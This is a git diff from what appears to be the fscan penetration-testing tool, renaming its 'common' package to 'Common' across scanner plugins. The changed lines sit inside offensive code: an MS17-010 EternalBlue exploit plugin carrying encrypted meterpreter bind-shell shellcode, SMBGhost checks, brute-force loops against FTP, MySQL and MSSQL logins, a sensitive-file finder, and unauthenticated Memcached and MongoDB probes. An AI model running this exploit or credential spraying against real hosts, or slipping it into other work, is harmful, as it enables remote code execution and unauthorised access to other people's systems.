diff --git a/common/Parse.go b/Common/Parse.go
similarity index 99%
rename from common/Parse.go
rename to Common/Parse.go
index 6151691..127e19a 100644
--- a/common/Parse.go
+++ b/Common/Parse.go
@@ -1,4 +1,4 @@
-package common
+package Common
import (
"bufio"
diff --git a/common/ParseIP.go b/Common/ParseIP.go
similarity index 99%
rename from common/ParseIP.go
rename to Common/ParseIP.go
index 66084be..316b319 100644
--- a/common/ParseIP.go
+++ b/Common/ParseIP.go
@@ -1,4 +1,4 @@
-package common
+package Common
import (
"bufio"
diff --git a/common/ParsePort.go b/Common/ParsePort.go
similarity index 98%
rename from common/ParsePort.go
rename to Common/ParsePort.go
index 4ccac9e..cec40e8 100644
--- a/common/ParsePort.go
+++ b/Common/ParsePort.go
@@ -1,4 +1,4 @@
-package common
+package Common
import (
"strconv"
diff --git a/Plugins/CVE-2020-0796.go b/Plugins/CVE-2020-0796.go
index 2297d1b..c07331c 100644
--- a/Plugins/CVE-2020-0796.go
+++ b/Plugins/CVE-2020-0796.go
@@ -6,7 +6,7 @@ import (
"github.com/shadow1ng/fscan/Config"
"time"
- "github.com/shadow1ng/fscan/common"
+ "github.com/shadow1ng/fscan/Common"
)
const (
@@ -96,7 +96,7 @@ const (
)
func SmbGhost(info *Config.HostInfo) error {
- if common.IsBrute {
+ if Common.IsBrute {
return nil
}
err := SmbGhostScan(info)
@@ -104,9 +104,9 @@ func SmbGhost(info *Config.HostInfo) error {
}
func SmbGhostScan(info *Config.HostInfo) error {
- ip, port, timeout := info.Host, 445, time.Duration(common.Timeout)*time.Second
+ ip, port, timeout := info.Host, 445, time.Duration(Common.Timeout)*time.Second
addr := fmt.Sprintf("%s:%v", info.Host, port)
- conn, err := common.WrapperTcpWithTimeout("tcp", addr, timeout)
+ conn, err := Common.WrapperTcpWithTimeout("tcp", addr, timeout)
if err != nil {
return err
}
@@ -123,7 +123,7 @@ func SmbGhostScan(info *Config.HostInfo) error {
}
if bytes.Contains(buff[:n], []byte("Public")) == true && len(buff[:n]) >= 76 && bytes.Equal(buff[72:74], []byte{0x11, 0x03}) && bytes.Equal(buff[74:76], []byte{0x02, 0x00}) {
result := fmt.Sprintf("[+] %v CVE-2020-0796 SmbGhost Vulnerable", ip)
- common.LogSuccess(result)
+ Common.LogSuccess(result)
}
return err
}
diff --git a/Plugins/ftp.go b/Plugins/FTP.go
similarity index 77%
rename from Plugins/ftp.go
rename to Plugins/FTP.go
index 19d925c..b973458 100644
--- a/Plugins/ftp.go
+++ b/Plugins/FTP.go
@@ -3,14 +3,14 @@ package Plugins
import (
"fmt"
"github.com/jlaffaye/ftp"
+ "github.com/shadow1ng/fscan/Common"
"github.com/shadow1ng/fscan/Config"
- "github.com/shadow1ng/fscan/common"
"strings"
"time"
)
func FtpScan(info *Config.HostInfo) (tmperr error) {
- if common.IsBrute {
+ if Common.IsBrute {
return
}
starttime := time.Now().Unix()
@@ -19,27 +19,27 @@ func FtpScan(info *Config.HostInfo) (tmperr error) {
return err
} else {
errlog := fmt.Sprintf("[-] ftp %v:%v %v %v", info.Host, info.Ports, "anonymous", err)
- common.LogError(errlog)
+ Common.LogError(errlog)
tmperr = err
- if common.CheckErrs(err) {
+ if Common.CheckErrs(err) {
return err
}
}
- for _, user := range common.Userdict["ftp"] {
- for _, pass := range common.Passwords {
+ for _, user := range Common.Userdict["ftp"] {
+ for _, pass := range Common.Passwords {
pass = strings.Replace(pass, "{user}", user, -1)
flag, err := FtpConn(info, user, pass)
if flag && err == nil {
return err
} else {
errlog := fmt.Sprintf("[-] ftp %v:%v %v %v %v", info.Host, info.Ports, user, pass, err)
- common.LogError(errlog)
+ Common.LogError(errlog)
tmperr = err
- if common.CheckErrs(err) {
+ if Common.CheckErrs(err) {
return err
}
- if time.Now().Unix()-starttime > (int64(len(common.Userdict["ftp"])*len(common.Passwords)) * common.Timeout) {
+ if time.Now().Unix()-starttime > (int64(len(Common.Userdict["ftp"])*len(Common.Passwords)) * Common.Timeout) {
return err
}
}
@@ -51,7 +51,7 @@ func FtpScan(info *Config.HostInfo) (tmperr error) {
func FtpConn(info *Config.HostInfo, user string, pass string) (flag bool, err error) {
flag = false
Host, Port, Username, Password := info.Host, info.Ports, user, pass
- conn, err := ftp.DialTimeout(fmt.Sprintf("%v:%v", Host, Port), time.Duration(common.Timeout)*time.Second)
+ conn, err := ftp.DialTimeout(fmt.Sprintf("%v:%v", Host, Port), time.Duration(Common.Timeout)*time.Second)
if err == nil {
err = conn.Login(Username, Password)
if err == nil {
@@ -73,7 +73,7 @@ func FtpConn(info *Config.HostInfo, user string, pass string) (flag bool, err er
}
}
}
- common.LogSuccess(result)
+ Common.LogSuccess(result)
}
}
return flag, err
diff --git a/Plugins/findnet.go b/Plugins/FindNet.go
similarity index 91%
rename from Plugins/findnet.go
rename to Plugins/FindNet.go
index 2a8355c..13da7b3 100644
--- a/Plugins/findnet.go
+++ b/Plugins/FindNet.go
@@ -4,8 +4,8 @@ import (
"bytes"
"encoding/hex"
"fmt"
+ "github.com/shadow1ng/fscan/Common"
"github.com/shadow1ng/fscan/Config"
- "github.com/shadow1ng/fscan/common"
"strconv"
"strings"
"time"
@@ -24,12 +24,12 @@ func Findnet(info *Config.HostInfo) error {
func FindnetScan(info *Config.HostInfo) error {
realhost := fmt.Sprintf("%s:%v", info.Host, 135)
- conn, err := common.WrapperTcpWithTimeout("tcp", realhost, time.Duration(common.Timeout)*time.Second)
+ conn, err := Common.WrapperTcpWithTimeout("tcp", realhost, time.Duration(Common.Timeout)*time.Second)
if err != nil {
return err
}
defer conn.Close()
- err = conn.SetDeadline(time.Now().Add(time.Duration(common.Timeout) * time.Second))
+ err = conn.SetDeadline(time.Now().Add(time.Duration(Common.Timeout) * time.Second))
if err != nil {
return err
}
@@ -119,6 +119,6 @@ func read(text []byte, host string) error {
}
result += "\n [->]" + string(host)
}
- common.LogSuccess(result)
+ Common.LogSuccess(result)
return nil
}
diff --git a/Plugins/icmp.go b/Plugins/ICMP.go
similarity index 95%
rename from Plugins/icmp.go
rename to Plugins/ICMP.go
index 36acc14..240228b 100644
--- a/Plugins/icmp.go
+++ b/Plugins/ICMP.go
@@ -3,7 +3,7 @@ package Plugins
import (
"bytes"
"fmt"
- "github.com/shadow1ng/fscan/common"
+ "github.com/shadow1ng/fscan/Common"
"golang.org/x/net/icmp"
"net"
"os/exec"
@@ -25,7 +25,7 @@ func CheckLive(hostslist []string, Ping bool) []string {
for ip := range chanHosts {
if _, ok := ExistHosts[ip]; !ok && IsContain(hostslist, ip) {
ExistHosts[ip] = struct{}{}
- if common.Silent == false {
+ if Common.Silent == false {
if Ping == false {
fmt.Printf("(icmp) Target %-15s is alive\n", ip)
} else {
@@ -47,7 +47,7 @@ func CheckLive(hostslist []string, Ping bool) []string {
if err == nil {
RunIcmp1(hostslist, conn, chanHosts)
} else {
- common.LogError(err)
+ Common.LogError(err)
//尝试无监听icmp探测
fmt.Println("trying RunIcmp2")
conn, err := net.DialTimeout("ip4:icmp", "127.0.0.1", 3*time.Second)
@@ -59,7 +59,7 @@ func CheckLive(hostslist []string, Ping bool) []string {
if err == nil {
RunIcmp2(hostslist, chanHosts)
} else {
- common.LogError(err)
+ Common.LogError(err)
//使用ping探测
fmt.Println("The current user permissions unable to send icmp packets")
fmt.Println("start ping")
@@ -72,17 +72,17 @@ func CheckLive(hostslist []string, Ping bool) []string {
close(chanHosts)
if len(hostslist) > 1000 {
- arrTop, arrLen := ArrayCountValueTop(AliveHosts, common.LiveTop, true)
+ arrTop, arrLen := ArrayCountValueTop(AliveHosts, Common.LiveTop, true)
for i := 0; i < len(arrTop); i++ {
output := fmt.Sprintf("[*] LiveTop %-16s 段存活数量为: %d", arrTop[i]+".0.0/16", arrLen[i])
- common.LogSuccess(output)
+ Common.LogSuccess(output)
}
}
if len(hostslist) > 256 {
- arrTop, arrLen := ArrayCountValueTop(AliveHosts, common.LiveTop, false)
+ arrTop, arrLen := ArrayCountValueTop(AliveHosts, Common.LiveTop, false)
for i := 0; i < len(arrTop); i++ {
output := fmt.Sprintf("[*] LiveTop %-16s 段存活数量为: %d", arrTop[i]+".0/24", arrLen[i])
- common.LogSuccess(output)
+ Common.LogSuccess(output)
}
}
diff --git a/Plugins/localinfo.go b/Plugins/LocalInfo.go
similarity index 97%
rename from Plugins/localinfo.go
rename to Plugins/LocalInfo.go
index 72835f7..eafb305 100644
--- a/Plugins/localinfo.go
+++ b/Plugins/LocalInfo.go
@@ -2,8 +2,8 @@ package Plugins
import (
"fmt"
+ "github.com/shadow1ng/fscan/Common"
"github.com/shadow1ng/fscan/Config"
- "github.com/shadow1ng/fscan/common"
"os"
"path/filepath"
"runtime"
@@ -93,7 +93,7 @@ func LocalInfoScan(info *Config.HostInfo) (err error) {
home, err := os.UserHomeDir()
if err != nil {
errlog := fmt.Sprintf("[-] Get UserHomeDir error: %v", err)
- common.LogError(errlog)
+ Common.LogError(errlog)
return err
}
@@ -148,7 +148,7 @@ func scanFixedLocations(home string) {
func checkAndLogFile(path string) {
if _, err := os.Stat(path); err == nil {
result := fmt.Sprintf("[+] Found sensitive file: %s", path)
- common.LogSuccess(result)
+ Common.LogSuccess(result)
}
}
@@ -202,7 +202,7 @@ func searchSensitiveFiles() {
fileName := strings.ToLower(info.Name())
if strings.Contains(fileName, white) {
result := fmt.Sprintf("[+] Found potential sensitive file: %s", path)
- common.LogSuccess(result)
+ Common.LogSuccess(result)
break
}
}
diff --git a/Plugins/ms17010-exp.go b/Plugins/MS17010-Exp.go
similarity index 98%
rename from Plugins/ms17010-exp.go
rename to Plugins/MS17010-Exp.go
index dbcdd7b..8b78405 100644
--- a/Plugins/ms17010-exp.go
+++ b/Plugins/MS17010-Exp.go
@@ -5,8 +5,8 @@ import (
"encoding/binary"
"encoding/hex"
"fmt"
+ "github.com/shadow1ng/fscan/Common"
"github.com/shadow1ng/fscan/Config"
- "github.com/shadow1ng/fscan/common"
"io"
"io/ioutil"
"net"
@@ -17,7 +17,7 @@ import (
func MS17010EXP(info *Config.HostInfo) {
address := info.Host + ":445"
var sc string
- switch common.SC {
+ switch Common.SC {
case "bind":
//msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=64531 -f hex
sc_enc := "gUYe7vm5/MQzTkSyKvpMFImS/YtwI+HxNUDd7MeUKDIxBZ8nsaUtdMEXIZmlZUfoQacylFEZpu7iWBRpQZw0KElIFkZR9rl4fpjyYNhEbf9JdquRrvw4hYMypBbfDQ6MN8csp1QF5rkMEs6HvtlKlGSaff34Msw6RlvEodROjGYA+mHUYvUTtfccymIqiU7hCFn+oaIk4ZtCS0Mzb1S5K5+U6vy3e5BEejJVA6u6I+EUb4AOSVVF8GpCNA91jWD1AuKcxg0qsMa+ohCWkWsOxh1zH0kwBPcWHAdHIs31g26NkF14Wl+DHStsW4DuNaxRbvP6awn+wD5aY/1QWlfwUeH/I+rkEPF18sTZa6Hr4mrDPT7eqh4UrcTicL/x4EgovNXA9X+mV6u1/4Zb5wy9rOVwJ+agXxfIqwL5r7R68BEPA/fLpx4LgvTwhvytO3w6I+7sZS7HekuKayBLNZ0T4XXeM8GpWA3h7zkHWjTm41/5JqWblQ45Msrg+XqD6WGvGDMnVZ7jE3xWIRBR7MrPAQ0Kl+Nd93/b+BEMwvuinXp1viSxEoZHIgJZDYR5DykQLpexasSpd8/WcuoQQtuTTYsJpHFfvqiwn0djgvQf3yk3Ro1EzjbR7a8UzwyaCqtKkCu9qGb+0m8JSpYS8DsjbkVST5Y7ZHtegXlX1d/FxgweavKGz3UiHjmbQ+FKkFF82Lkkg+9sO3LMxp2APvYz2rv8RM0ujcPmkN2wXE03sqcTfDdjCWjJ/evdrKBRzwPFhjOjUX1SBVsAcXzcvpJbAf3lcPPxOXM060OYdemu4Hou3oECjKP2h6W9GyPojMuykTkcoIqgN5Ldx6WpGhhE9wrfijOrrm7of9HmO568AsKRKBPfy/QpCfxTrY+rEwyzFmU1xZ2lkjt+FTnsMJY8YM7sIbWZauZ2S+Ux33RWDf7YUmSGlWC8djqDKammk3GgkSPHjf0Qgknukptxl977s2zw4jdh8bUuW5ap7T+Wd/S0ka90CVF4AyhonvAQoi0G1qj5gTih1FPTjBpf+FrmNJvNIAcx2oBoU4y48c8Sf4ABtpdyYewUh4NdxUoL7RSVouU1MZTnYS9BqOJWLMnvV7pwRmHgUz3fe7Kx5PGnP/0zQjW/P/vgmLMh/iBisJIGF3JDGoULsC3dabGE5L7sXuCNePiOEJmgwOHlFBlwqddNaE+ufor0q4AkQBI9XeqznUfdJg2M2LkUZOYrbCjQaE7Ytsr3WJSXkNbOORzqKo5wIf81z1TCow8QuwlfwIanWs+e8oTavmObV3gLPoaWqAIUzJqwD9O4P6x1176D0Xj83n6G4GrJgHpgMuB0qdlK"
@@ -34,16 +34,16 @@ func MS17010EXP(info *Config.HostInfo) {
sc_enc := "Teobs46+kgUn45BOBbruUdpBFXs8uKXWtvYoNbWtKpNCtOasHB/5Er+C2ZlALluOBkUC6BQVZHO1rKzuygxJ3n2PkeutispxSzGcvFS3QJ1EU517e2qOL7W2sRDlNb6rm+ECA2vQZkTZBAboolhGfZYeM6v5fEB2L1Ej6pWF5CKSYxjztdPF8bNGAkZsQhUAVW7WVKysZ1vbghszGyeKFQBvO9Hiinq/XiUrLBqvwXLsJaybZA44wUFvXC0FA9CZDOSD3MCX2arK6Mhk0Q+6dAR+NWPCQ34cYVePT98GyXnYapTOKokV6+hsqHMjfetjkvjEFohNrD/5HY+E73ihs9TqS1ZfpBvZvnWSOjLUA+Z3ex0j0CIUONCjHWpoWiXAsQI/ryJh7Ho5MmmGIiRWyV3l8Q0+1vFt3q/zQGjSI7Z7YgDdIBG8qcmfATJz6dx7eBS4Ntl+4CCqN8Dh4pKM3rV+hFqQyKnBHI5uJCn6qYky7p305KK2Z9Ga5nAqNgaz0gr2GS7nA5D/Cd8pvUH6sd2UmN+n4HnK6/O5hzTmXG/Pcpq7MTEy9G8uXRfPUQdrbYFP7Ll1SWy35B4n/eCf8swaTwi1mJEAbPr0IeYgf8UiOBKS/bXkFsnUKrE7wwG8xXaI7bHFgpdTWfdFRWc8jaJTvwK2HUK5u+4rWWtf0onGxTUyTilxgRFvb4AjVYH0xkr8mIq8smpsBN3ff0TcWYfnI2L/X1wJoCH+oLi67xMN+yPDirT+LXfLOaGlyTqG6Yojge8Mti/BqIg5RpG4wIZPKxX9rPbMP+Tzw8rpi/9b33eq0YDevzqaj5Uo0HudOmaPwv5cd9/dqWgeC7FJwv73TckogZGbDOASSoLK26AgBat8vCrhrd7T0uBrEk+1x/NXvl5r2aEeWCWBsULKxFh2WDCqyQntSaAUkPe3JKJe0HU6inDeS4d52BagSqmd1meY0Rb/97fMCXaAMLekq+YrwcSrmPKBY9Yk0m1kAzY+oP4nvV/OhCHNXAsUQGH85G7k65I1QnzffroaKxloP26XJPW0JEq9vCSQFI/EX56qt323V/solearWdBVptG0+k55TBd0dxmBsqRMGO3Z23OcmQR4d8zycQUqqavMmo32fy4rjY6Ln5QUR0JrgJ67dqDhnJn5TcT4YFHgF4gY8oynT3sqv0a+hdVeF6XzsElUUsDGfxOLfkn3RW/2oNnqAHC2uXwX2ZZNrSbPymB2zxB/ET3SLlw3skBF1A82ZBYqkMIuzs6wr9S9ox9minLpGCBeTR9j6OYk6mmKZnThpvarRec8a7YBuT2miU7fO8iXjhS95A84Ub++uS4nC1Pv1v9nfj0/T8scD2BUYoVKCJX3KiVnxUYKVvDcbvv8UwrM6+W/hmNOePHJNx9nX1brHr90m9e40as1BZm2meUmCECxQd+Hdqs7HgPsPLcUB8AL8wCHQjziU6R4XKuX6ivx"
sc = AesDecrypt(sc_enc, key)
default:
- if strings.Contains(common.SC, "file:") {
- read, err := ioutil.ReadFile(common.SC[5:])
+ if strings.Contains(Common.SC, "file:") {
+ read, err := ioutil.ReadFile(Common.SC[5:])
if err != nil {
- errlog := fmt.Sprintf("[-] ms17010 sc readfile %v error: %v", common.SC, err)
- common.LogError(errlog)
+ errlog := fmt.Sprintf("[-] ms17010 sc readfile %v error: %v", Common.SC, err)
+ Common.LogError(errlog)
return
}
sc = fmt.Sprintf("%x", read)
} else {
- sc = common.SC
+ sc = Common.SC
}
}
@@ -54,15 +54,15 @@ func MS17010EXP(info *Config.HostInfo) {
sc1, err := hex.DecodeString(sc)
if err != nil {
- common.LogError("[-] " + info.Host + " MS17-010 shellcode decode error " + err.Error())
+ Common.LogError("[-] " + info.Host + " MS17-010 shellcode decode error " + err.Error())
return
}
err = eternalBlue(address, 12, 12, sc1)
if err != nil {
- common.LogError("[-] " + info.Host + " MS17-010 exp failed " + err.Error())
+ Common.LogError("[-] " + info.Host + " MS17-010 exp failed " + err.Error())
return
}
- common.LogSuccess("[*] " + info.Host + "\tMS17-010\texploit end")
+ Common.LogSuccess("[*] " + info.Host + "\tMS17-010\texploit end")
}
func eternalBlue(address string, initialGrooms, maxAttempts int, sc []byte) error {
diff --git a/Plugins/ms17010.go b/Plugins/MS17010.go
similarity index 94%
rename from Plugins/ms17010.go
rename to Plugins/MS17010.go
index 0f30ead..500b6e1 100644
--- a/Plugins/ms17010.go
+++ b/Plugins/MS17010.go
@@ -5,8 +5,8 @@ import (
"encoding/hex"
"errors"
"fmt"
+ "github.com/shadow1ng/fscan/Common"
"github.com/shadow1ng/fscan/Config"
- "github.com/shadow1ng/fscan/common"
"strings"
"time"
)
@@ -25,13 +25,13 @@ var (
)
func MS17010(info *Config.HostInfo) error {
- if common.IsBrute {
+ if Common.IsBrute {
return nil
}
err := MS17010Scan(info)
if err != nil {
errlog := fmt.Sprintf("[-] Ms17010 %v %v", info.Host, err)
- common.LogError(errlog)
+ Common.LogError(errlog)
}
return err
}
@@ -39,13 +39,13 @@ func MS17010(info *Config.HostInfo) error {
func MS17010Scan(info *Config.HostInfo) error {
ip := info.Host
// connecting to a host in LAN if reachable should be very quick
- conn, err := common.WrapperTcpWithTimeout("tcp", ip+":445", time.Duration(common.Timeout)*time.Second)
+ conn, err := Common.WrapperTcpWithTimeout("tcp", ip+":445", time.Duration(Common.Timeout)*time.Second)
if err != nil {
//fmt.Printf("failed to connect to %s\n", ip)
return err
}
defer conn.Close()
- err = conn.SetDeadline(time.Now().Add(time.Duration(common.Timeout) * time.Second))
+ err = conn.SetDeadline(time.Now().Add(time.Duration(Common.Timeout) * time.Second))
if err != nil {
//fmt.Printf("failed to connect to %s\n", ip)
return err
@@ -132,9 +132,9 @@ func MS17010Scan(info *Config.HostInfo) error {
//if runtime.GOOS=="windows" {fmt.Printf("%s\tMS17-010\t(%s)\n", ip, os)
//} else{fmt.Printf("\033[33m%s\tMS17-010\t(%s)\033[0m\n", ip, os)}
result := fmt.Sprintf("[+] MS17-010 %s\t(%s)", ip, os)
- common.LogSuccess(result)
+ Common.LogSuccess(result)
defer func() {
- if common.SC != "" {
+ if Common.SC != "" {
MS17010EXP(info)
}
}()
@@ -154,12 +154,12 @@ func MS17010Scan(info *Config.HostInfo) error {
if reply[34] == 0x51 {
result := fmt.Sprintf("[+] MS17-010 %s has DOUBLEPULSAR SMB IMPLANT", ip)
- common.LogSuccess(result)
+ Common.LogSuccess(result)
}
} else {
result := fmt.Sprintf("[*] OsInfo %s\t(%s)", ip, os)
- common.LogSuccess(result)
+ Common.LogSuccess(result)
}
return err
diff --git a/Plugins/mssql.go b/Plugins/MSSQL.go
similarity index 68%
rename from Plugins/mssql.go
rename to Plugins/MSSQL.go
index 2048709..f12e87a 100644
--- a/Plugins/mssql.go
+++ b/Plugins/MSSQL.go
@@ -4,31 +4,31 @@ import (
"database/sql"
"fmt"
_ "github.com/denisenkom/go-mssqldb"
+ "github.com/shadow1ng/fscan/Common"
"github.com/shadow1ng/fscan/Config"
- "github.com/shadow1ng/fscan/common"
"strings"
"time"
)
func MssqlScan(info *Config.HostInfo) (tmperr error) {
- if common.IsBrute {
+ if Common.IsBrute {
return
}
starttime := time.Now().Unix()
- for _, user := range common.Userdict["mssql"] {
- for _, pass := range common.Passwords {
+ for _, user := range Common.Userdict["mssql"] {
+ for _, pass := range Common.Passwords {
pass = strings.Replace(pass, "{user}", user, -1)
flag, err := MssqlConn(info, user, pass)
if flag == true && err == nil {
return err
} else {
errlog := fmt.Sprintf("[-] mssql %v:%v %v %v %v", info.Host, info.Ports, user, pass, err)
- common.LogError(errlog)
+ Common.LogError(errlog)
tmperr = err
- if common.CheckErrs(err) {
+ if Common.CheckErrs(err) {
return err
}
- if time.Now().Unix()-starttime > (int64(len(common.Userdict["mssql"])*len(common.Passwords)) * common.Timeout) {
+ if time.Now().Unix()-starttime > (int64(len(Common.Userdict["mssql"])*len(Common.Passwords)) * Common.Timeout) {
return err
}
}
@@ -40,17 +40,17 @@ func MssqlScan(info *Config.HostInfo) (tmperr error) {
func MssqlConn(info *Config.HostInfo, user string, pass string) (flag bool, err error) {
flag = false
Host, Port, Username, Password := info.Host, info.Ports, user, pass
- dataSourceName := fmt.Sprintf("server=%s;user id=%s;password=%s;port=%v;encrypt=disable;timeout=%v", Host, Username, Password, Port, time.Duration(common.Timeout)*time.Second)
+ dataSourceName := fmt.Sprintf("server=%s;user id=%s;password=%s;port=%v;encrypt=disable;timeout=%v", Host, Username, Password, Port, time.Duration(Common.Timeout)*time.Second)
db, err := sql.Open("mssql", dataSourceName)
if err == nil {
- db.SetConnMaxLifetime(time.Duration(common.Timeout) * time.Second)
- db.SetConnMaxIdleTime(time.Duration(common.Timeout) * time.Second)
+ db.SetConnMaxLifetime(time.Duration(Common.Timeout) * time.Second)
+ db.SetConnMaxIdleTime(time.Duration(Common.Timeout) * time.Second)
db.SetMaxIdleConns(0)
defer db.Close()
err = db.Ping()
if err == nil {
result := fmt.Sprintf("[+] mssql %v:%v:%v %v", Host, Port, Username, Password)
- common.LogSuccess(result)
+ Common.LogSuccess(result)
flag = true
}
}
diff --git a/Plugins/memcached.go b/Plugins/Memcached.go
similarity index 75%
rename from Plugins/memcached.go
rename to Plugins/Memcached.go
index 0ad4e7d..cade9ba 100644
--- a/Plugins/memcached.go
+++ b/Plugins/Memcached.go
@@ -2,22 +2,22 @@ package Plugins
import (
"fmt"
+ "github.com/shadow1ng/fscan/Common"
"github.com/shadow1ng/fscan/Config"
- "github.com/shadow1ng/fscan/common"
"strings"
"time"
)
func MemcachedScan(info *Config.HostInfo) (err error) {
realhost := fmt.Sprintf("%s:%v", info.Host, info.Ports)
- client, err := common.WrapperTcpWithTimeout("tcp", realhost, time.Duration(common.Timeout)*time.Second)
+ client, err := Common.WrapperTcpWithTimeout("tcp", realhost, time.Duration(Common.Timeout)*time.Second)
defer func() {
if client != nil {
client.Close()
}
}()
if err == nil {
- err = client.SetDeadline(time.Now().Add(time.Duration(common.Timeout) * time.Second))
+ err = client.SetDeadline(time.Now().Add(time.Duration(Common.Timeout) * time.Second))
if err == nil {
_, err = client.Write([]byte("stats\n")) //Set the key randomly to prevent the key on the server from being overwritten
if err == nil {
@@ -26,11 +26,11 @@ func MemcachedScan(info *Config.HostInfo) (err error) {
if err == nil {
if strings.Contains(string(rev[:n]), "STAT") {
result := fmt.Sprintf("[+] Memcached %s unauthorized", realhost)
- common.LogSuccess(result)
+ Common.LogSuccess(result)
}
} else {
errlog := fmt.Sprintf("[-] Memcached %v:%v %v", info.Host, info.Ports, err)
- common.LogError(errlog)
+ Common.LogError(errlog)
}
}
}
diff --git a/Plugins/mongodb.go b/Plugins/Mongodb.go
similarity index 90%
rename from Plugins/mongodb.go
rename to Plugins/Mongodb.go
index 36805c2..82a6af2 100644
--- a/Plugins/mongodb.go
+++ b/Plugins/Mongodb.go
@@ -2,20 +2,20 @@ package Plugins
import (
"fmt"
+ "github.com/shadow1ng/fscan/Common"
"github.com/shadow1ng/fscan/Config"
- "github.com/shadow1ng/fscan/common"
"strings"
"time"
)
func MongodbScan(info *Config.HostInfo) error {
- if common.IsBrute {
+ if Common.IsBrute {
return nil
}
_, err := MongodbUnauth(info)
if err != nil {
errlog := fmt.Sprintf("[-] Mongodb %v:%v %v", info.Host, info.Ports, err)
- common.LogError(errlog)
+ Common.LogError(errlog)
}
return err
}
@@ -49,12 +49,12 @@ func MongodbUnauth(info *Config.HostInfo) (flag bool, err error) {
realhost := fmt.Sprintf("%s:%v", info.Host, info.Ports)
checkUnAuth := func(address string, packet []byte) (string, error) {
- conn, err := common.WrapperTcpWithTimeout("tcp", realhost, time.Duration(common.Timeout)*time.Second)
+ conn, err := Common.WrapperTcpWithTimeout("tcp", realhost, time.Duration(Common.Timeout)*time.Second)
if err != nil {
return "", err
}
defer conn.Close()
- err = conn.SetReadDeadline(time.Now().Add(time.Duration(common.Timeout) * time.Second))
+ err = conn.SetReadDeadline(time.Now().Add(time.Duration(Common.Timeout) * time.Second))
if err != nil {
return "", err
}
@@ -81,7 +81,7 @@ func MongodbUnauth(info *Config.HostInfo) (flag bool, err error) {
if strings.Contains(reply, "totalLinesWritten") {
flag = true
result := fmt.Sprintf("[+] Mongodb %v unauthorized", realhost)
- common.LogSuccess(result)
+ Common.LogSuccess(result)
}
return flag, err
}
diff --git a/Plugins/mysql.go b/Plugins/MySQL.go
similarity index 67%
rename from Plugins/mysql.go
rename to Plugins/MySQL.go
index 23e578f..8a193d4 100644
--- a/Plugins/mysql.go
+++ b/Plugins/MySQL.go
@@ -4,31 +4,31 @@ import (
"database/sql"
"fmt"
_ "github.com/go-sql-driver/mysql"
+ "github.com/shadow1ng/fscan/Common"
"github.com/shadow1ng/fscan/Config"
- "github.com/shadow1ng/fscan/common"
"strings"
"time"
)
func MysqlScan(info *Config.HostInfo) (tmperr error) {
- if common.IsBrute {
+ if Common.IsBrute {
return
}
starttime := time.Now().Unix()
- for _, user := range common.Userdict["mysql"] {
- for _, pass := range common.Passwords {
+ for _, user := range Common.Userdict["mysql"] {
+ for _, pass := range Common.Passwords {
pass = strings.Replace(pass, "{user}", user, -1)
flag, err := MysqlConn(info, user, pass)
if flag == true && err == nil {
return err
} else {
errlog := fmt.Sprintf("[-] mysql %v:%v %v %v %v", info.Host, info.Ports, user, pass, err)
- common.LogError(errlog)
+ Common.LogError(errlog)
tmperr = err
- if common.CheckErrs(err) {
+ if Common.CheckErrs(err) {
return err
}
- if time.Now().Unix()-starttime > (int64(len(common.Userdict["mysql"])*len(common.Passwords)) * common.Timeout) {
+ if time.Now().Unix()-starttime > (int64(len(Common.Userdict["mysql"])*len(Common.Passwords)) * Common.Timeout) {
return err
}
}
@@ -40,17 +40,17 @@ func MysqlScan(info *Config.HostInfo) (tmperr error) {
func MysqlConn(info *Config.HostInfo, user string, pass string) (flag bool, err error) {
flag = false
Host, Port, Username, Password := info.Host, info.Ports, user, pass
- dataSourceName := fmt.Sprintf("%v:%v@tcp(%v:%v)/mysql?charset=utf8&timeout=%v", Username, Password, Host, Port, time.Duration(common.Timeout)*time.Second)
+ dataSourceName := fmt.Sprintf("%v:%v@tcp(%v:%v)/mysql?charset=utf8&timeout=%v", Username, Password, Host, Port, time.Duration(Common.Timeout)*time.Second)
db, err := sql.Open("mysql", dataSourceName)
if err == nil {
- db.SetConnMaxLifetime(time.Duration(common.Timeout) * time.Second)
- db.SetConnMaxIdleTime(time.Duration(common.Timeout) * time.Second)
+ db.SetConnMaxLifetime(time.Duration(Common.Timeout) * time.Second)
+ db.SetConnMaxIdleTime(time.Duration(Common.Timeout) * time.Second)
db.SetMaxIdleConns(0)
defer db.Close()
err = db.Ping()
if err == nil {
result := fmt.Sprintf("[+] mysql %v:%v:%v %v", Host, Port, Username, Password)
- common.LogSuccess(result)
+ Common.LogSuccess(result)
flag = true
}
}
diff --git a/Plugins/NetBIOS.go b/Plugins/NetBIOS.go
index b025f5c..e2fa349 100644
--- a/Plugins/NetBIOS.go
+++ b/Plugins/NetBIOS.go
@@ -4,8 +4,8 @@ import (
"bytes"
"errors"
"fmt"
+ "github.com/shadow1ng/fscan/Common"
"github.com/shadow1ng/fscan/Config"
- "github.com/shadow1ng/fscan/common"
"gopkg.in/yaml.v3"
"net"
"strconv"
@@ -20,7 +20,7 @@ func NetBIOS(info *Config.HostInfo) error {
output := netbios.String()
if len(output) > 0 {
result := fmt.Sprintf("[*] NetBios %-15s %s", info.Host, output)
- common.LogSuccess(result)
+ Common.LogSuccess(result)
return nil
}
return errNetBIOS
@@ -41,12 +41,12 @@ func NetBIOS1(info *Config.HostInfo) (netbios NetBiosInfo, err error) {
}
realhost := fmt.Sprintf("%s:%v", info.Host, info.Ports)
var conn net.Conn
- conn, err = common.WrapperTcpWithTimeout("tcp", realhost, time.Duration(common.Timeout)*time.Second)
+ conn, err = Common.WrapperTcpWithTimeout("tcp", realhost, time.Duration(Common.Timeout)*time.Second)
if err != nil {
return
}
defer conn.Close()
- err = conn.SetDeadline(time.Now().Add(time.Duration(common.Timeout) * time.Second))
+ err = conn.SetDeadline(time.Now().Add(time.Duration(Common.Timeout) * time.Second))
if err != nil {
return
}
@@ -89,12 +89,12 @@ func GetNbnsname(info *Config.HostInfo) (netbios NetBiosInfo, err error) {
senddata1 := []byte{102, 102, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 32, 67, 75, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 0, 0, 33, 0, 1}
//senddata1 := []byte("ff\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00 CKAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\x00\x00!\x00\x01")
realhost := fmt.Sprintf("%s:137", info.Host)
- conn, err := net.DialTimeout("udp", realhost, time.Duration(common.Timeout)*time.Second)
+ conn, err := net.DialTimeout("udp", realhost, time.Duration(Common.Timeout)*time.Second)
